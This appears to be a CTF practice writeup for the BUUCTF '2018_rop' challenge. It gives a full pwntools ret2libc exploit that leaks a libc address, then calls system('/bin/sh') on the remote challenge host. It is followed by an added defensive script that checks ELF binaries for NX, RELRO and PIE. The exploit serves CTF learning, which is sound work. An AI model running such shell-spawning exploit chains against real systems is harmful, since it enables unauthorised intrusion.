BUUCTF practice: 铁人三项(第五赛区)_2018_rop

Brose, 2022-02-10, 90 views

BUUCTF online judge

Plain ret2libc, which is simple, except that write takes three arguments, all of which have to be placed on the stack after the return address.

exp:

from pwn import *
from LibcSearcher import *

context(os = 'linux', arch = 'i386', log_level = 'debug')
#r = process('./rop')
r = remote('node4.buuoj.cn', 26575)
elf = ELF('./rop')

main = 0x080484C6

# Stage 1: overflow the 140-byte buffer up to the saved return address, then call
# write(1, got['write'], 4) so the process prints the resolved libc address of write.
# Under the i386 cdecl convention the frame is: write@plt, return address (main), arg1, arg2, arg3.
# p32() returns bytes, so on Python 3 the padding must be bytes as well (b'a', not 'a').
payload = b'a'*140 + p32(elf.plt['write']) + p32(main) + p32(1) + p32(elf.got['write']) + p32(0x4)
r.sendline(payload)
write_addr = u32(r.recv(4))
print(hex(write_addr))

# Identify the remote libc from the leaked address and derive its load offset.
libc = LibcSearcher('write', write_addr)
offset = write_addr - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')

# Stage 2: back in main, overflow again and call system("/bin/sh"); b'bbbb' is the dummy return address.
payload = b'a'*140 + p32(system) + b'bbbb' + p32(binsh)
r.sendline(payload)

r.interactive()
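Which build-time mitigations this chain depends on can be read straight from the ELF headers, which is the check a defender would run on a binary like ./rop. The following is an added example, not part of the original writeup: a minimal ELF32 program-header parser reporting NX, RELRO and PIE, with a constructed header-only sample so it runs offline; elf32_mitigations, blocks_hardcoded_ret2libc and build_sample_elf32 are names assumed here.

```python
import struct

# ELF constants (from the ELF spec) used by the check below.
ET_DYN, PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 3, 2, 0x6474E551, 0x6474E552
PF_X, DT_NULL, DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 1, 0, 24, 30, 0x8

def elf32_mitigations(data: bytes) -> dict:
    """Report NX / RELRO / PIE for a little-endian ELF32 image held in memory."""
    if data[:5] != b"\x7fELF\x01":            # EI_MAG + EI_CLASS == ELFCLASS32
        raise ValueError("not an ELF32 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<I", data, 28)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    result = {"nx": False, "relro": "none", "pie": e_type == ET_DYN}
    bind_now = False
    for i in range(e_phnum):
        p_type, p_offset, _, _, p_filesz, _, p_flags, _ = struct.unpack_from(
            "<8I", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            result["nx"] = not (p_flags & PF_X)   # stack mapped without PROT_EXEC
        elif p_type == PT_GNU_RELRO:
            result["relro"] = "partial"            # GOT becomes read-only only after lazy binding
        elif p_type == PT_DYNAMIC:
            for off in range(p_offset, p_offset + p_filesz, 8):
                d_tag, d_val = struct.unpack_from("<iI", data, off)
                if d_tag == DT_NULL:
                    break
                if d_tag == DT_BIND_NOW or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW):
                    bind_now = True
    if result["relro"] == "partial" and bind_now:
        result["relro"] = "full"                   # GOT resolved at load, then write-protected
    return result

def blocks_hardcoded_ret2libc(m: dict) -> bool:
    """True when the writeup's chain (fixed PLT/GOT/main addresses) cannot work as-is: NX does not
    stop ROP, RELRO never stops *reading* the GOT, only PIE breaks the hardcoded addresses."""
    return m["pie"]

def build_sample_elf32(pie: bool = False, bind_now: bool = False) -> bytes:
    """Constructed sample: a header-only ELF32 image with just the program headers the check reads."""
    phoff, phnum, phentsize = 52, 3, 32
    dyn_off = phoff + phnum * phentsize
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW if bind_now else 0) + struct.pack("<iI", DT_NULL, 0)
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9) + struct.pack(
        "<HHIIIIIHHHHHH", ET_DYN if pie else 2, 3, 1, 0, phoff, 0, 0, 52, phentsize, phnum, 40, 0, 0)
    phdrs = (struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, 6, 16)         # PF_R|PF_W, no PF_X
             + struct.pack("<8I", PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1)
             + struct.pack("<8I", PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4))
    return ehdr + phdrs + dyn
```

A stack canary is not visible in these headers (it shows up as an imported `__stack_chk_fail` symbol), so this check covers only the loader-level mitigations.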